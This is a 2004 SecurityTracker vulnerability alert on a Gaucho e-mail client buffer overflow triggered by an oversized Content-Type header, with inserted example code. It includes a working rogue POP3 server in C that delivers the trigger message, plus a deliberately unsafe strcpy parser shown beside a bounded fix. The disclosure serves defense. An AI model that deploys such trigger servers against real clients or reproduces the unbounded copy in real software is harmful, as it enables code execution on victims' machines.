SecurityTracker.com
Category:   Application (E-mail Client)  >   Gaucho
Vendor:   NakedSoft
Gaucho Buffer Overflow in Processing Mail Headers Via POP3 Lets Remote Servers Execute Arbitrary Code
SecurityTracker Alert ID:  1011032
SecurityTracker URL:  http://securitytracker.com/id/1011032
CVE Reference:   GENERIC-MAP-NOMATCH   (no matching CVE entry)
Date:  Aug 23 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.4 Build 145
Description:   Tan Chew Keong of SIG^2 reported a vulnerability in the Gaucho e-mail client. A remote POP3 server can execute arbitrary code on a connected client.

When a connected Gaucho client retrieves mail, the POP3 server can return a message whose Content-Type header value is abnormally long (roughly 280 characters in the published sample). Parsing that value overflows a buffer in the client and overwrites a Structured Exception Handler (SEH) record, so that when the resulting exception is dispatched the server controls EIP and can execute arbitrary code.

A demonstration exploit header is provided:

Date: Mon, 09 Aug 2004 19:44:13 +0800
Subject: Testing
To: a@aaaaaa.xxx
From: XX <xx@xxxxxxxx.xxx.xx>
Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>
MIME-Version: 1.0
Content-Type: AAAAAAAAAAAAA[approx. 280 chars]...; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Mailer: Gaucho Version 1.4.0 Build 145
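The delivery path that the alert describes, as an added example that is not part of the original alert, not SIG^2's gaucho140poc.cpp and not Gaucho code: a minimal rogue POP3 server in C that greets whichever client connects, answers the login and listing commands, and serves a single message whose Content-Type value is an oversized run of filler. The listening port (1100), the loopback-only bind and the 280-byte filler of 'A' bytes are assumptions; a working exploit would replace the filler with a payload laid out for the client's SEH record, which this example deliberately does not do.

```c
/* Added example, not the SIG^2 PoC and not Gaucho code: a rogue POP3 server that hands
 * one message with an oversized Content-Type value to whichever client connects.
 * Assumptions: loopback port 1100, 280 bytes of 'A' as the filler. */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define LISTEN_PORT 1100   /* assumed; any unprivileged port works */
#define FILLER_LEN  280    /* the advisory's "approx. 280 chars" */

/* Write the trigger message into buf. Headers follow the advisory's sample; the
 * Content-Type value is filler_len copies of filler_byte. Returns the length or -1
 * if it does not fit. No line starts with '.', so no POP3 dot-stuffing is needed. */
int build_trigger_message(char *buf, size_t cap, size_t filler_len, char filler_byte)
{
    char filler[2048];
    if (filler_len >= sizeof filler)
        return -1;
    memset(filler, filler_byte, filler_len);
    filler[filler_len] = '\0';
    int n = snprintf(buf, cap,
        "Date: Mon, 09 Aug 2004 19:44:13 +0800\r\n"
        "Subject: Testing\r\n"
        "To: a@aaaaaa.xxx\r\n"
        "From: XX <xx@xxxxxxxx.xxx.xx>\r\n"
        "MIME-Version: 1.0\r\n"
        "Content-Type: %s; charset=US-ASCII\r\n"
        "Content-Transfer-Encoding: 7bit\r\n"
        "\r\n"
        "test\r\n", filler);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Map one client command (CRLF stripped) to the reply. Everything a client sends before
 * RETR is answered +OK so the session reaches the message; CAPA and other extensions get
 * -ERR so the client falls back to plain USER/PASS. Sets *quit on QUIT. Returns the
 * reply length or -1 if it does not fit. */
int pop3_reply(const char *cmd, const char *msg, int msg_len,
               char *out, size_t cap, int *quit)
{
    int n;
    *quit = 0;
    if (!strncasecmp(cmd, "USER", 4) || !strncasecmp(cmd, "PASS", 4) ||
        !strncasecmp(cmd, "NOOP", 4) || !strncasecmp(cmd, "DELE", 4))
        n = snprintf(out, cap, "+OK\r\n");
    else if (!strncasecmp(cmd, "STAT", 4))
        n = snprintf(out, cap, "+OK 1 %d\r\n", msg_len);
    else if (!strncasecmp(cmd, "LIST", 4))
        n = snprintf(out, cap, "+OK 1 messages\r\n1 %d\r\n.\r\n", msg_len);
    else if (!strncasecmp(cmd, "UIDL", 4))
        n = snprintf(out, cap, "+OK\r\n1 trigger0001\r\n.\r\n");
    else if (!strncasecmp(cmd, "RETR", 4) || !strncasecmp(cmd, "TOP", 3))
        n = snprintf(out, cap, "+OK %d octets\r\n%s.\r\n", msg_len, msg);
    else if (!strncasecmp(cmd, "QUIT", 4)) {
        *quit = 1;
        n = snprintf(out, cap, "+OK bye\r\n");
    } else
        n = snprintf(out, cap, "-ERR unsupported\r\n");
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

int main(void)
{
    static char msg[4096], line[512], reply[8192];
    static const char greeting[] = "+OK rogue POP3 ready\r\n";
    int msg_len = build_trigger_message(msg, sizeof msg, FILLER_LEN, 'A');
    if (msg_len < 0)
        return 1;
    int srv = socket(AF_INET, SOCK_STREAM, 0), one = 1, quit = 0;
    setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(LISTEN_PORT);
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);   /* lab use only: loopback bind */
    if (bind(srv, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(srv, 1) < 0) {
        perror("bind/listen");
        return 1;
    }
    printf("rogue POP3 on 127.0.0.1:%d, waiting for one client\n", LISTEN_PORT);
    int c = accept(srv, NULL, NULL);
    FILE *in = c < 0 ? NULL : fdopen(c, "r");
    if (!in || write(c, greeting, sizeof greeting - 1) < 0)
        return 1;
    while (!quit && fgets(line, sizeof line, in)) {
        line[strcspn(line, "\r\n")] = '\0';          /* one command per line */
        int n = pop3_reply(line, msg, msg_len, reply, sizeof reply, &quit);
        if (n < 0 || write(c, reply, (size_t)n) != n)
            break;
    }
    fclose(in);
    close(srv);
    return 0;
}
```

Build it, run it, and point a lab client's POP3 account at 127.0.0.1 port 1100; the server serves exactly one session and exits when the client sends QUIT or disconnects. Any client that does not understand an unexpected -ERR to CAPA will still proceed with USER/PASS, which is all this server needs to reach RETR.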

A demonstration exploit is available at:

http://www.security.org.sg/vuln/gaucho140poc.cpp

The vendor was reportedly notified on August 10, 2004.

The original advisory is available at:

http://www.security.org.sg/vuln/gaucho140.html

Impact:   A remote server can execute arbitrary code on the target client when the client connects to the server. Because the trigger is a header of the retrieved message rather than a property of the POP3 session, a message carrying such a header that reaches the user's mailbox through an ordinary server could plausibly do the same; the advisory, however, only demonstrates the rogue-server case.
Solution:   The vendor has issued a fixed version (1.4 Build 151), available at:

http://homepage1.nifty.com/nakedsoft/Gaucho/Gaucho14.html

Vendor URL:  homepage1.nifty.com/nakedsoft/Gaucho/Gaucho.html
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Gaucho 1.4 Email Client Buffer Overflow Vulnerability


SIG^2 Vulnerability Research Advisory

Gaucho 1.4 Email Client has Buffer Overflow Vulnerability when Receiving 
Email Headers with Abnormally Long Content-Type Field

by Tan Chew Keong
Release Date: 23 Aug 2004


ADVISORY URL

http://www.security.org.sg/vuln/gaucho140.html


SUMMARY

Gaucho (http://homepage1.nifty.com/nakedsoft/) is an e-mail client 
developed by NakedSoft for Microsoft Windows platforms. Gaucho supports 
SMTP, POP3 and other e-mail delivery protocols. Gaucho version 1.4 Build 
145 is vulnerable to a buffer overflow when receiving malformed e-mails 
from a POP3 server. The overflow is triggered when Gaucho receives from 
the POP3 server a specially crafted e-mail with an abnormally long string 
in the Content-Type field of the e-mail header. The string overruns a 
buffer on the stack and overwrites a Structured Exception Handler (SEH) 
record, so that when the resulting exception is dispatched the 
attacker-supplied handler address is loaded into EIP; the flaw can 
therefore be exploited to execute arbitrary code.

 
TESTED SYSTEM

Gaucho 1.4 Build 145 on English Win2K SP4

 
DETAILS

Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow that is 
triggered when Gaucho receives from the POP3 server a specially crafted 
e-mail with an abnormally long string in the Content-Type field of the 
e-mail header. The string overwrites an SEH record on the stack, giving 
control of EIP when the exception is dispatched, and the flaw can be 
exploited to execute arbitrary code. A sample e-mail that triggers the 
overflow is shown below.


Date: Mon, 09 Aug 2004 19:44:13 +0800
Subject: Testing
To: a@aaaaaa.xxx
From: XX <xx@xxxxxxxx.xxx.xx>
Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>
MIME-Version: 1.0
Content-Type: AAAAAAAAAAAAA[approx. 280 chars]...; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Mailer: Gaucho Version 1.4.0 Build 145
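The bug class behind the overflow, as an added illustration that is not Gaucho's source (the advisory does not show the vulnerable code): a Content-Type header-value parser written the way such clients typically were, a fixed-size stack buffer filled with strcpy, beside a bounded replacement that refuses values it cannot hold. The 256-byte buffer size and the function names are assumptions; the advisory states only that a value of roughly 280 bytes overflows.

```c
/* Added illustration of the bug class, not Gaucho's source. CT_MAX is an assumed buffer
 * size; the advisory only says a value of roughly 280 bytes overflows. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define CT_MAX 256

struct content_type {
    char media[CT_MAX];   /* e.g. "text/plain" */
    char charset[64];     /* e.g. "US-ASCII", empty if absent */
};

/* The pattern that produces the advisory's overflow: the header value is copied into a
 * fixed-size stack buffer with no length check. A 280-byte value overruns tmp and the
 * data saved above it; on Windows that reaches the frame's SEH record, and when the
 * damaged frame later faults, exception dispatch jumps to the overwritten handler
 * address, which is the "EIP via SEH" control the advisory describes. Kept only for
 * contrast; nothing below calls it. */
int parse_content_type_unchecked(const char *value, struct content_type *out)
{
    char tmp[CT_MAX];
    strcpy(tmp, value);                 /* no bound: overflows when strlen(value) >= CT_MAX */
    char *semi = strchr(tmp, ';');
    if (semi)
        *semi = '\0';
    strcpy(out->media, tmp);
    out->charset[0] = '\0';
    return 0;
}

/* Bounded replacement. Refuses values that cannot fit instead of silently truncating
 * them (a truncated media type could be misparsed), splits the media type from its
 * parameters, and copies each piece with an explicit length. Returns 0 on success and
 * -1 on empty, overlong or malformed input. */
int parse_content_type_checked(const char *value, struct content_type *out)
{
    size_t len = strnlen(value, CT_MAX);
    if (len == 0 || len >= CT_MAX)
        return -1;                      /* empty, or too long for the buffer */

    const char *semi = strchr(value, ';');
    size_t mlen = semi ? (size_t)(semi - value) : len;
    while (mlen > 0 && (value[mlen - 1] == ' ' || value[mlen - 1] == '\t'))
        mlen--;
    if (mlen == 0)
        return -1;                      /* "; charset=..." with no media type */
    memcpy(out->media, value, mlen);
    out->media[mlen] = '\0';

    out->charset[0] = '\0';
    if (semi) {
        const char *p = semi + 1;
        while (*p == ' ' || *p == '\t')
            p++;
        if (strncasecmp(p, "charset=", 8) == 0) {
            p += 8;
            size_t clen = strcspn(p, "; \t");
            if (clen >= sizeof out->charset)
                return -1;              /* parameter too long: same rule, reject */
            memcpy(out->charset, p, clen);
            out->charset[clen] = '\0';
        }
    }
    return 0;
}

int main(void)
{
    /* Constructed input shaped like the advisory's sample: 280 'A's, then the charset. */
    char trigger[320];
    memset(trigger, 'A', 280);
    strcpy(trigger + 280, "; charset=US-ASCII");

    struct content_type ct;
    printf("trigger value: %s\n",
           parse_content_type_checked(trigger, &ct) == 0 ? "accepted" : "rejected (overlong)");
    if (parse_content_type_checked("text/plain; charset=US-ASCII", &ct) == 0)
        printf("benign value: media=%s charset=%s\n", ct.media, ct.charset);
    return 0;
}
```

The hardened parser rejects rather than truncates: a client that silently cut the value at 255 bytes would still be memory-safe, but it would then render the message under a media type the sender never declared, which is its own source of bugs. Rejecting on length also gives a natural place to log the event, since a 280-character Content-Type value has no legitimate use.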


PATCH

The author has fixed the vulnerability in Version 1.4 Build 151. Users are 
advised to upgrade to the fixed version. The patched build can be 
downloaded from the following link.
http://homepage1.nifty.com/nakedsoft/Gaucho/Gaucho14.html


PROOF-OF-CONCEPT

Proof-of-concept code to validate this vulnerability can be downloaded 
from the following URL.
http://www.security.org.sg/vuln/gaucho140poc.cpp

 
DISCLOSURE TIMELINE

09 Aug 04 - Vulnerability Discovered
10 Aug 04 - Initial Vendor Notification (no reply)
12 Aug 04 - Second Vendor Notification
14 Aug 04 - Author replied with fixed version
23 Aug 04 - Public Release


GREETINGS

All guys at SIG^2 G-TEC Lab
http://www.security.org.sg/webdocs/g-tec.html

"IT Security...the Gathering. By enthusiasts for enthusiasts."

Copyright 2021, SecurityGlobal.net LLC